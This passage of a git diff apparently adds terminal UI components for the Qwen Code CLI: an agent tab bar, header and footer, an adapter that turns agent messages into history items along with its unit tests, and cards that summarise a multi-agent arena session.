ApprovalMode } from '@qwen-code/qwen-code-core'; +import { AutoAcceptIndicator } from '../AutoAcceptIndicator.js'; +import { ContextUsageDisplay } from '../ContextUsageDisplay.js'; +import { theme } from '../../semantic-colors.js'; + +interface AgentFooterProps { + approvalMode: ApprovalMode | undefined; + promptTokenCount: number; + contextWindowSize: number | undefined; + terminalWidth: number; +} + +export const AgentFooter: React.FC = ({ + approvalMode, + promptTokenCount, + contextWindowSize, + terminalWidth, +}) => { + const showApproval = + approvalMode !== undefined && approvalMode !== ApprovalMode.DEFAULT; + const showContext = promptTokenCount > 0 && contextWindowSize !== undefined; + + if (!showApproval && !showContext) { + return null; + } + + return ( + + + {showApproval ? ( + + ) : null} + + + {showContext && ( + + + + )} + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentHeader.tsx b/packages/cli/src/ui/components/agent-view/AgentHeader.tsx new file mode 100644 index 000000000..1bf9d4c34 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentHeader.tsx @@ -0,0 +1,64 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Compact header for agent tabs, visually distinct from the + * main view's boxed logo header. Shows model, working directory, and git + * branch in a bordered info panel. + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { shortenPath, tildeifyPath } from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; + +interface AgentHeaderProps { + modelId: string; + modelName?: string; + workingDirectory: string; + gitBranch?: string; +} + +export const AgentHeader: React.FC = ({ + modelId, + modelName, + workingDirectory, + gitBranch, +}) => { + const { columns: terminalWidth } = useTerminalSize(); + const maxPathLen = Math.max(20, terminalWidth - 12); + const displayPath = shortenPath(tildeifyPath(workingDirectory), maxPathLen); + + const modelText = + modelName && modelName !== modelId ? `${modelId} (${modelName})` : modelId; + + return ( + + + {'Model: '} + {modelText} + + + {'Path: '} + {displayPath} + + {gitBranch && ( + + {'Branch: '} + {gitBranch} + + )} + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentTabBar.tsx b/packages/cli/src/ui/components/agent-view/AgentTabBar.tsx new file mode 100644 index 000000000..c7b0b113c --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentTabBar.tsx @@ -0,0 +1,167 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentTabBar — horizontal tab strip for in-process agent views. + * + * Rendered at the top of the terminal whenever in-process agents are registered. + * + * On the main tab, Left/Right switch tabs when the input buffer is empty. + * On agent tabs, the tab bar uses an exclusive-focus model: + * - Down arrow at the input's bottom edge focuses the tab bar + * - Left/Right switch tabs only when the tab bar is focused + * - Up arrow or typing returns focus to the input + * + * Tab indicators: running, idle/completed, failed, cancelled + */ + +import { Box, Text } from 'ink'; +import { useState, useEffect, useCallback } from 'react'; +import { AgentStatus, AgentEventType } from '@qwen-code/qwen-code-core'; +import { + useAgentViewState, + useAgentViewActions, + type RegisteredAgent, +} from '../../contexts/AgentViewContext.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { useUIState } from '../../contexts/UIStateContext.js'; +import { theme } from '../../semantic-colors.js'; + +// ─── Status Indicators ────────────────────────────────────── + +function statusIndicator(agent: RegisteredAgent): { + symbol: string; + color: string; +} { + const status = agent.interactiveAgent.getStatus(); + switch (status) { + case AgentStatus.RUNNING: + case AgentStatus.INITIALIZING: + return { symbol: '\u25CF', color: theme.status.warning }; // ● running + case AgentStatus.IDLE: + return { symbol: '\u25CF', color: theme.status.success }; // ● idle (ready) + case AgentStatus.COMPLETED: + return { symbol: '\u2713', color: theme.status.success }; // ✓ completed + case AgentStatus.FAILED: + return { symbol: '\u2717', color: theme.status.error }; // ✗ failed + case AgentStatus.CANCELLED: + return { symbol: '\u25CB', color: theme.text.secondary }; // ○ cancelled + default: + return { symbol: '\u25CB', color: theme.text.secondary }; // ○ fallback + } +} + +// ─── Component ────────────────────────────────────────────── + +export const AgentTabBar: React.FC = () => { + const { activeView, agents, agentShellFocused, agentTabBarFocused } = + useAgentViewState(); + const { switchToNext, switchToPrevious, setAgentTabBarFocused } = + useAgentViewActions(); + const { embeddedShellFocused } = useUIState(); + + useKeypress( + (key) => { + if (embeddedShellFocused || agentShellFocused) return; + if (!agentTabBarFocused) return; + + if (key.name === 'left') { + switchToPrevious(); + } else if (key.name === 'right') { + switchToNext(); + } else if (key.name === 'up') { + setAgentTabBarFocused(false); + } else if ( + key.sequence && + key.sequence.length === 1 && + !key.ctrl && + !key.meta + ) { + // Printable character → return focus to input (key falls through + // to BaseTextInput's useKeypress and gets typed normally) + setAgentTabBarFocused(false); + } + }, + { isActive: true }, + ); + + // Subscribe to STATUS_CHANGE events from all agents so the tab bar + // re-renders when an agent's status transitions (e.g. RUNNING → COMPLETED). + // Without this, status indicators would be stale until the next unrelated render. + const [, setTick] = useState(0); + const forceRender = useCallback(() => setTick((t) => t + 1), []); + + useEffect(() => { + const cleanups: Array<() => void> = []; + for (const [, agent] of agents) { + const emitter = agent.interactiveAgent.getEventEmitter(); + if (emitter) { + emitter.on(AgentEventType.STATUS_CHANGE, forceRender); + cleanups.push(() => + emitter.off(AgentEventType.STATUS_CHANGE, forceRender), + ); + } + } + return () => cleanups.forEach((fn) => fn()); + }, [agents, forceRender]); + + const isFocused = agentTabBarFocused; + + // Navigation hint varies by context + const hint = isFocused ? '\u2190/\u2192 switch \u2191 input' : '\u2193 tabs'; + + return ( + + {/* Main tab */} + + + {' Main '} + + + + {/* Separator */} + + {'\u2502'} + + + {/* Agent tabs */} + {[...agents.entries()].map(([agentId, agent]) => { + const isActive = activeView === agentId; + const { symbol, color: indicatorColor } = statusIndicator(agent); + + return ( + + + {` ${agent.modelId} `} + + + {` ${symbol}`} + + + ); + })} + + {/* Navigation hint */} + + {hint} + + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts new file mode 100644 index 000000000..afedfc2b6 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.test.ts @@ -0,0 +1,510 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { agentMessagesToHistoryItems } from './agentHistoryAdapter.js'; +import type { + AgentMessage, + ToolCallConfirmationDetails, +} from '@qwen-code/qwen-code-core'; +import { ToolCallStatus } from '../../types.js'; + +// ─── Helpers ──────────────────────────────────────────────── + +function msg( + role: AgentMessage['role'], + content: string, + extra?: Partial, +): AgentMessage { + return { role, content, timestamp: 0, ...extra }; +} + +const noApprovals = new Map(); + +function toolCallMsg( + callId: string, + toolName: string, + opts?: { description?: string; renderOutputAsMarkdown?: boolean }, +): AgentMessage { + return msg('tool_call', `Tool call: ${toolName}`, { + metadata: { + callId, + toolName, + description: opts?.description ?? '', + renderOutputAsMarkdown: opts?.renderOutputAsMarkdown, + }, + }); +} + +function toolResultMsg( + callId: string, + toolName: string, + opts?: { + success?: boolean; + resultDisplay?: string; + outputFile?: string; + }, +): AgentMessage { + return msg('tool_result', `Tool ${toolName}`, { + metadata: { + callId, + toolName, + success: opts?.success ?? true, + resultDisplay: opts?.resultDisplay, + outputFile: opts?.outputFile, + }, + }); +} + +// ─── Role mapping ──────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — role mapping', () => { + it('maps user message', () => { + const items = agentMessagesToHistoryItems( + [msg('user', 'hello')], + noApprovals, + ); + expect(items).toHaveLength(1); + expect(items[0]).toMatchObject({ type: 'user', text: 'hello' }); + }); + + it('maps plain assistant message', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'response')], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'gemini', text: 'response' }); + }); + + it('maps thought assistant message', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'thinking...', { thought: true })], + noApprovals, + ); + expect(items[0]).toMatchObject({ + type: 'gemini_thought', + text: 'thinking...', + }); + }); + + it('maps assistant message with error metadata', () => { + const items = agentMessagesToHistoryItems( + [msg('assistant', 'oops', { metadata: { error: true } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'error', text: 'oops' }); + }); + + it('maps info message with no level → type info', () => { + const items = agentMessagesToHistoryItems( + [msg('info', 'note')], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'info', text: 'note' }); + }); + + it.each([ + ['warning', 'warning'], + ['success', 'success'], + ['error', 'error'], + ] as const)('maps info message with level=%s', (level, expectedType) => { + const items = agentMessagesToHistoryItems( + [msg('info', 'text', { metadata: { level } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: expectedType }); + }); + + it('maps unknown info level → type info', () => { + const items = agentMessagesToHistoryItems( + [msg('info', 'x', { metadata: { level: 'verbose' } })], + noApprovals, + ); + expect(items[0]).toMatchObject({ type: 'info' }); + }); + + it('skips unknown roles without crashing', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'before'), + // force an unknown role + { role: 'unknown' as AgentMessage['role'], content: 'x', timestamp: 0 }, + msg('user', 'after'), + ], + noApprovals, + ); + expect(items).toHaveLength(2); + expect(items[0]).toMatchObject({ type: 'user', text: 'before' }); + expect(items[1]).toMatchObject({ type: 'user', text: 'after' }); + }); +}); + +// ─── Tool grouping ─────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool grouping', () => { + it('merges a tool_call + tool_result pair into one tool_group', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'read_file'), toolResultMsg('c1', 'read_file')], + noApprovals, + ); + expect(items).toHaveLength(1); + expect(items[0]!.type).toBe('tool_group'); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools).toHaveLength(1); + expect(group.tools[0]!.name).toBe('read_file'); + }); + + it('merges multiple parallel tool calls into one tool_group', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read_file'), + toolCallMsg('c2', 'write_file'), + toolResultMsg('c1', 'read_file'), + toolResultMsg('c2', 'write_file'), + ], + noApprovals, + ); + expect(items).toHaveLength(1); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools).toHaveLength(2); + expect(group.tools[0]!.name).toBe('read_file'); + expect(group.tools[1]!.name).toBe('write_file'); + }); + + it('preserves tool call order by first appearance', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c2', 'second'), + toolCallMsg('c1', 'first'), + toolResultMsg('c1', 'first'), + toolResultMsg('c2', 'second'), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.name).toBe('second'); + expect(group.tools[1]!.name).toBe('first'); + }); + + it('breaks tool groups at non-tool messages', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'tool_a'), + toolResultMsg('c1', 'tool_a'), + msg('assistant', 'between'), + toolCallMsg('c2', 'tool_b'), + toolResultMsg('c2', 'tool_b'), + ], + noApprovals, + ); + expect(items).toHaveLength(3); + expect(items[0]!.type).toBe('tool_group'); + expect(items[1]!.type).toBe('gemini'); + expect(items[2]!.type).toBe('tool_group'); + }); + + it('handles tool_result arriving without a prior tool_call gracefully', () => { + const items = agentMessagesToHistoryItems( + [ + toolResultMsg('c1', 'orphan', { + success: true, + resultDisplay: 'output', + }), + ], + noApprovals, + ); + expect(items).toHaveLength(1); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.callId).toBe('c1'); + expect(group.tools[0]!.status).toBe(ToolCallStatus.Success); + }); +}); + +// ─── Tool status ───────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool status', () => { + it('Executing: tool_call with no result yet', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Executing); + }); + + it('Success: tool_result with success=true', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read'), + toolResultMsg('c1', 'read', { success: true }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Success); + }); + + it('Error: tool_result with success=false', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'write'), + toolResultMsg('c1', 'write', { success: false }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Error); + }); + + it('Confirming: tool_call present in pendingApprovals', () => { + const fakeApproval = {} as ToolCallConfirmationDetails; + const approvals = new Map([['c1', fakeApproval]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + approvals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Confirming); + expect(group.tools[0]!.confirmationDetails).toBe(fakeApproval); + }); + + it('Confirming takes priority over Executing', () => { + // pending approval AND no result yet → Confirming, not Executing + const approvals = new Map([['c1', {} as ToolCallConfirmationDetails]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + approvals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.status).toBe(ToolCallStatus.Confirming); + }); +}); + +// ─── Tool metadata ─────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — tool metadata', () => { + it('forwards resultDisplay from tool_result', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'read'), + toolResultMsg('c1', 'read', { + success: true, + resultDisplay: 'file contents', + }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('file contents'); + }); + + it('forwards renderOutputAsMarkdown from tool_call', () => { + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'web_fetch', { renderOutputAsMarkdown: true }), + toolResultMsg('c1', 'web_fetch', { success: true }), + ], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.renderOutputAsMarkdown).toBe(true); + }); + + it('forwards description from tool_call', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'read', { description: 'reading src/index.ts' })], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.description).toBe('reading src/index.ts'); + }); +}); + +// ─── liveOutputs overlay ───────────────────────────────────── + +describe('agentMessagesToHistoryItems — liveOutputs', () => { + it('uses liveOutput as resultDisplay for Executing tools', () => { + const liveOutputs = new Map([['c1', 'live stdout so far']]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('live stdout so far'); + }); + + it('ignores liveOutput for completed tools', () => { + const liveOutputs = new Map([['c1', 'stale live output']]); + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'shell'), + toolResultMsg('c1', 'shell', { + success: true, + resultDisplay: 'final output', + }), + ], + noApprovals, + liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBe('final output'); + }); + + it('falls back to entry resultDisplay when no liveOutput for callId', () => { + const liveOutputs = new Map([['other-id', 'unrelated']]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + liveOutputs, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.resultDisplay).toBeUndefined(); + }); +}); + +// ─── shellPids overlay ─────────────────────────────────────── + +describe('agentMessagesToHistoryItems — shellPids', () => { + it('sets ptyId for Executing tools with a known PID', () => { + const shellPids = new Map([['c1', 12345]]); + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + undefined, + shellPids, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBe(12345); + }); + + it('does not set ptyId for completed tools', () => { + const shellPids = new Map([['c1', 12345]]); + const items = agentMessagesToHistoryItems( + [ + toolCallMsg('c1', 'shell'), + toolResultMsg('c1', 'shell', { success: true }), + ], + noApprovals, + undefined, + shellPids, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBeUndefined(); + }); + + it('does not set ptyId when shellPids is not provided', () => { + const items = agentMessagesToHistoryItems( + [toolCallMsg('c1', 'shell')], + noApprovals, + ); + const group = items[0] as Extract< + (typeof items)[0], + { type: 'tool_group' } + >; + expect(group.tools[0]!.ptyId).toBeUndefined(); + }); +}); + +// ─── ID stability ──────────────────────────────────────────── + +describe('agentMessagesToHistoryItems — ID stability', () => { + it('assigns monotonically increasing IDs', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'u1'), + msg('assistant', 'a1'), + msg('info', 'i1'), + toolCallMsg('c1', 'tool'), + toolResultMsg('c1', 'tool'), + ], + noApprovals, + ); + const ids = items.map((i) => i.id); + expect(ids).toEqual([0, 1, 2, 3]); + }); + + it('tool_group consumes one ID regardless of how many calls it contains', () => { + const items = agentMessagesToHistoryItems( + [ + msg('user', 'go'), + toolCallMsg('c1', 'tool_a'), + toolCallMsg('c2', 'tool_b'), + toolResultMsg('c1', 'tool_a'), + toolResultMsg('c2', 'tool_b'), + msg('assistant', 'done'), + ], + noApprovals, + ); + // user=0, tool_group=1, assistant=2 + expect(items.map((i) => i.id)).toEqual([0, 1, 2]); + }); + + it('IDs from a prefix of messages are stable when more messages are appended', () => { + const base: AgentMessage[] = [msg('user', 'u'), msg('assistant', 'a')]; + + const before = agentMessagesToHistoryItems(base, noApprovals); + const after = agentMessagesToHistoryItems( + [...base, msg('info', 'i')], + noApprovals, + ); + + expect(after[0]!.id).toBe(before[0]!.id); + expect(after[1]!.id).toBe(before[1]!.id); + expect(after[2]!.id).toBe(2); + }); +}); diff --git a/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts new file mode 100644 index 000000000..951618abf --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/agentHistoryAdapter.ts @@ -0,0 +1,194 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview agentHistoryAdapter — converts AgentMessage[] to HistoryItem[]. + * + * This adapter bridges the sub-agent data model (AgentMessage[] from + * AgentInteractive) to the shared rendering model (HistoryItem[] consumed by + * HistoryItemDisplay). It lives in the CLI package so that packages/core types + * are never coupled to CLI rendering types. + * + * ID stability: AgentMessage[] is append-only, so the resulting HistoryItem[] + * only ever grows. Index-based IDs are therefore stable — Ink's + * requires items never shift or be removed, which this guarantees. + */ + +import type { + AgentMessage, + ToolCallConfirmationDetails, + ToolResultDisplay, +} from '@qwen-code/qwen-code-core'; +import type { HistoryItem, IndividualToolCallDisplay } from '../../types.js'; +import { ToolCallStatus } from '../../types.js'; + +/** + * Convert AgentMessage[] + pendingApprovals into HistoryItem[]. + * + * Consecutive tool_call / tool_result messages are merged into a single + * tool_group HistoryItem. pendingApprovals overlays confirmation state so + * ToolGroupMessage can render confirmation dialogs. + * + * liveOutputs (optional) provides real-time display data for executing tools. + * shellPids (optional) provides PTY PIDs for interactive shell tools so + * HistoryItemDisplay can render ShellInputPrompt on the active shell. + */ +export function agentMessagesToHistoryItems( + messages: readonly AgentMessage[], + pendingApprovals: ReadonlyMap, + liveOutputs?: ReadonlyMap, + shellPids?: ReadonlyMap, +): HistoryItem[] { + const items: HistoryItem[] = []; + let nextId = 0; + let i = 0; + + while (i < messages.length) { + const msg = messages[i]!; + + // ── user ────────────────────────────────────────────────── + if (msg.role === 'user') { + items.push({ type: 'user', text: msg.content, id: nextId++ }); + i++; + + // ── assistant ───────────────────────────────────────────── + } else if (msg.role === 'assistant') { + if (msg.metadata?.['error']) { + items.push({ type: 'error', text: msg.content, id: nextId++ }); + } else if (msg.thought) { + items.push({ type: 'gemini_thought', text: msg.content, id: nextId++ }); + } else { + items.push({ type: 'gemini', text: msg.content, id: nextId++ }); + } + i++; + + // ── info / warning / success / error ────────────────────── + } else if (msg.role === 'info') { + const level = msg.metadata?.['level'] as string | undefined; + const type = + level === 'warning' || level === 'success' || level === 'error' + ? level + : 'info'; + items.push({ type, text: msg.content, id: nextId++ }); + i++; + + // ── tool_call / tool_result → tool_group ────────────────── + } else if (msg.role === 'tool_call' || msg.role === 'tool_result') { + const groupId = nextId++; + + const callMap = new Map< + string, + { + callId: string; + name: string; + description: string; + resultDisplay: ToolResultDisplay | string | undefined; + outputFile: string | undefined; + renderOutputAsMarkdown: boolean | undefined; + success: boolean | undefined; + } + >(); + const callOrder: string[] = []; + + while ( + i < messages.length && + (messages[i]!.role === 'tool_call' || + messages[i]!.role === 'tool_result') + ) { + const m = messages[i]!; + const callId = (m.metadata?.['callId'] as string) ?? `unknown-${i}`; + + if (m.role === 'tool_call') { + if (!callMap.has(callId)) callOrder.push(callId); + callMap.set(callId, { + callId, + name: (m.metadata?.['toolName'] as string) ?? 'unknown', + description: (m.metadata?.['description'] as string) ?? '', + resultDisplay: undefined, + outputFile: undefined, + renderOutputAsMarkdown: m.metadata?.['renderOutputAsMarkdown'] as + | boolean + | undefined, + success: undefined, + }); + } else { + // tool_result — attach to existing call entry + const entry = callMap.get(callId); + const resultDisplay = m.metadata?.['resultDisplay'] as + | ToolResultDisplay + | string + | undefined; + const outputFile = m.metadata?.['outputFile'] as string | undefined; + const success = m.metadata?.['success'] as boolean; + + if (entry) { + entry.success = success; + entry.resultDisplay = resultDisplay; + entry.outputFile = outputFile; + } else { + // Result arrived without a prior tool_call message (shouldn't + // normally happen, but handle gracefully) + callOrder.push(callId); + callMap.set(callId, { + callId, + name: (m.metadata?.['toolName'] as string) ?? 'unknown', + description: '', + resultDisplay, + outputFile, + renderOutputAsMarkdown: undefined, + success, + }); + } + } + i++; + } + + const tools: IndividualToolCallDisplay[] = callOrder.map((callId) => { + const entry = callMap.get(callId)!; + const approval = pendingApprovals.get(callId); + + let status: ToolCallStatus; + if (approval) { + status = ToolCallStatus.Confirming; + } else if (entry.success === undefined) { + status = ToolCallStatus.Executing; + } else if (entry.success) { + status = ToolCallStatus.Success; + } else { + status = ToolCallStatus.Error; + } + + // For executing tools, use live output if available (Gap 4) + const resultDisplay = + status === ToolCallStatus.Executing && liveOutputs?.has(callId) + ? liveOutputs.get(callId) + : entry.resultDisplay; + + return { + callId: entry.callId, + name: entry.name, + description: entry.description, + resultDisplay, + outputFile: entry.outputFile, + renderOutputAsMarkdown: entry.renderOutputAsMarkdown, + status, + confirmationDetails: approval, + ptyId: + status === ToolCallStatus.Executing + ? shellPids?.get(callId) + : undefined, + }; + }); + + items.push({ type: 'tool_group', tools, id: groupId }); + } else { + // Skip unknown roles + i++; + } + } + + return items; +} diff --git a/packages/cli/src/ui/components/agent-view/index.ts b/packages/cli/src/ui/components/agent-view/index.ts new file mode 100644 index 000000000..c1e595c22 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/index.ts @@ -0,0 +1,12 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +export { AgentTabBar } from './AgentTabBar.js'; +export { AgentChatView } from './AgentChatView.js'; +export { AgentHeader } from './AgentHeader.js'; +export { AgentComposer } from './AgentComposer.js'; +export { AgentFooter } from './AgentFooter.js'; +export { agentMessagesToHistoryItems } from './agentHistoryAdapter.js'; diff --git a/packages/cli/src/ui/components/arena/ArenaCards.tsx b/packages/cli/src/ui/components/arena/ArenaCards.tsx new file mode 100644 index 000000000..1ad7d8e2a --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaCards.tsx @@ -0,0 +1,290 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { Box, Text } from 'ink'; +import { theme } from '../../semantic-colors.js'; +import { formatDuration } from '../../utils/formatters.js'; +import { getArenaStatusLabel } from '../../utils/displayUtils.js'; +import type { ArenaAgentCardData } from '../../types.js'; + +// ─── Helpers ──────────────────────────────────────────────── + +// ─── Agent Complete Card ──────────────────────────────────── + +interface ArenaAgentCardProps { + agent: ArenaAgentCardData; + width?: number; +} + +export const ArenaAgentCard: React.FC = ({ + agent, + width, +}) => { + const { icon, text, color } = getArenaStatusLabel(agent.status); + const duration = formatDuration(agent.durationMs); + const tokens = agent.totalTokens.toLocaleString(); + const inTokens = agent.inputTokens.toLocaleString(); + const outTokens = agent.outputTokens.toLocaleString(); + + return ( + + {/* Line 1: Status icon + text + label + duration */} + + + {icon} {agent.label} · {text} · {duration} + + + + {/* Line 2: Tokens */} + + + Tokens: {tokens} (in {inTokens}, out {outTokens}) + + + + {/* Line 3: Tool Calls with colored success/error counts */} + + + Tool Calls: {agent.toolCalls} + {agent.failedToolCalls > 0 && ( + <> + {' '} + ( + + ✓ {agent.successfulToolCalls} + + + ✕ {agent.failedToolCalls}) + + )} + + + + {/* Error line (if terminated with error) */} + {agent.error && ( + + {agent.error} + + )} + + ); +}; + +// ─── Session Complete Card ────────────────────────────────── + +interface ArenaSessionCardProps { + sessionStatus: string; + task: string; + totalDurationMs: number; + agents: ArenaAgentCardData[]; + width?: number; +} + +/** + * Pad or truncate a string to a fixed visual width. + */ +function pad( + str: string, + len: number, + align: 'left' | 'right' = 'left', +): string { + if (str.length >= len) return str.slice(0, len); + const padding = ' '.repeat(len - str.length); + return align === 'right' ? padding + str : str + padding; +} + +/** + * Truncate a string to a maximum length, adding ellipsis if truncated. + */ +function truncate(str: string, maxLen: number): string { + if (str.length <= maxLen) return str; + return str.slice(0, maxLen - 1) + '…'; +} + +/** + * Calculate diff stats from a unified diff string. + * Returns the stats string and individual counts for colored rendering. + */ +function getDiffStats(diff: string | undefined): { + text: string; + additions: number; + deletions: number; +} { + if (!diff) return { text: '', additions: 0, deletions: 0 }; + const lines = diff.split('\n'); + let additions = 0; + let deletions = 0; + for (const line of lines) { + if (line.startsWith('+') && !line.startsWith('+++')) { + additions++; + } else if (line.startsWith('-') && !line.startsWith('---')) { + deletions++; + } + } + return { text: `+${additions}/-${deletions}`, additions, deletions }; +} + +const MAX_MODEL_NAME_LENGTH = 35; + +export const ArenaSessionCard: React.FC = ({ + sessionStatus, + task, + agents, + width, +}) => { + // Truncate task for display + const maxTaskLen = 60; + const displayTask = + task.length > maxTaskLen ? task.slice(0, maxTaskLen - 1) + '…' : task; + + // Column widths for the agent table (unified with Arena Results) + const colStatus = 14; + const colTime = 8; + const colTokens = 10; + const colChanges = 10; + + const titleLabel = + sessionStatus === 'idle' + ? 'Agents Status · Idle' + : sessionStatus === 'completed' + ? 'Arena Complete' + : sessionStatus === 'cancelled' + ? 'Arena Cancelled' + : 'Arena Failed'; + + return ( + + {/* Title - neutral color (not green) */} + + + {titleLabel} + + + + + + {/* Task */} + + + Task: + "{displayTask}" + + + + + + {/* Table header - unified columns: Agent, Status, Time, Tokens, Changes */} + + + + Agent + + + + + Status + + + + + Time + + + + + Tokens + + + + + Changes + + + + + {/* Table separator */} + + + {'─'.repeat((width ?? 60) - 8)} + + + + {/* Agent rows */} + {agents.map((agent) => { + const { text: statusText, color } = getArenaStatusLabel(agent.status); + const diffStats = getDiffStats(agent.diff); + return ( + + + + {truncate(agent.label, MAX_MODEL_NAME_LENGTH)} + + + + {statusText} + + + + {pad(formatDuration(agent.durationMs), colTime - 1, 'right')} + + + + + {pad( + agent.totalTokens.toLocaleString(), + colTokens - 1, + 'right', + )} + + + + {diffStats.additions > 0 || diffStats.deletions > 0 ? ( + + + +{diffStats.additions} + + / + -{diffStats.deletions} + + ) : ( + - + )} + + + ); + })} + + + + {/* Hint */} + {sessionStatus === 'idle' && ( + + + Switch to an agent tab to continue, or{' '} + /arena select to pick a + winner. + + + )} + {sessionStatus === 'completed' && ( + + + Run /arena select to pick a + winner. + + + )} + + ); +}; diff --git a/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx b/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx new file mode 100644 index 000000000..88fe5a507 --- /dev/null +++ b/packages/cli/src/ui/components/arena/ArenaSelectDialog.tsx @@ -0,0 +1,260 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type React from 'react'; +import { useCallback, useMemo } from 'react'; +import { Box, Text } from 'ink'; +import { + type ArenaManager, + isSuccessStatus, + type Config, +} from '@qwen-code/qwen-code-core'; +import { theme } from '../../semantic-colors.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { MessageType, type HistoryItemWithoutId } from '../../types.js'; +import type { UseHistoryManagerReturn } from '../../hooks/useHistoryManager.js'; +import { formatDuration } from '../../utils/formatters.js'; +import { getArenaStatusLabel } from '../../utils/displayUtils.js'; +import { DescriptiveRadioButtonSelect } from '../shared/DescriptiveRadioButtonSelect.js'; +import type { DescriptiveRadioSelectItem } from '../shared/DescriptiveRadioButtonSelect.js'; + +interface ArenaSelectDialogProps { + manager: ArenaManager; + config: Config; + addItem: UseHistoryManagerReturn['addItem']; + closeArenaDialog: () => void; +} + +export function 